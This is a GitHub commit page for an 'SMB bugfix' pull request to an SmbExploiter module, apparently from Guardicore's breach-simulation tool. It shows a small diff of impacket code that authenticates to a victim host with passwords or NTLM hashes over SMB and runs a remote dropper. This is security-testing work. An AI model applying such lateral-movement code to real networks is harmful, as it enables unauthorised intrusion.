Merge pull request #895 from guardicore/smb_exec_bugfix

SMB bugfix
This commit is contained in:
VakarisZ 2020-12-15 12:11:53 +02:00 committed by GitHub
commit cd27a889b1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 5 deletions

View File

@ -1,7 +1,6 @@
from logging import getLogger
from impacket.dcerpc.v5 import scmr, transport
from impacket.smbconnection import SMB_DIALECT
from common.utils.attack_utils import ScanStatus, UsageEnum
from common.utils.exploit_enum import ExploitType
@ -104,7 +103,7 @@ class SmbExploiter(HostExploiter):
LOG.debug("Exploiter SmbExec is giving up...")
return False
self.set_vulnerable_port(self.host)
self.set_vulnerable_port()
# execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
@ -121,8 +120,7 @@ class SmbExploiter(HostExploiter):
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,))
rpctransport.set_dport(port)
if hasattr(rpctransport, 'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
rpctransport.setRemoteHost(self.host.ip_addr)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None)
@ -168,7 +166,7 @@ class SmbExploiter(HostExploiter):
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
return True
def set_vulnerable_port(self, host: VictimHost):
def set_vulnerable_port(self):
if 'tcp-445' in self.host.services:
self.vulnerable_port = "445"
elif 'tcp-139' in self.host.services: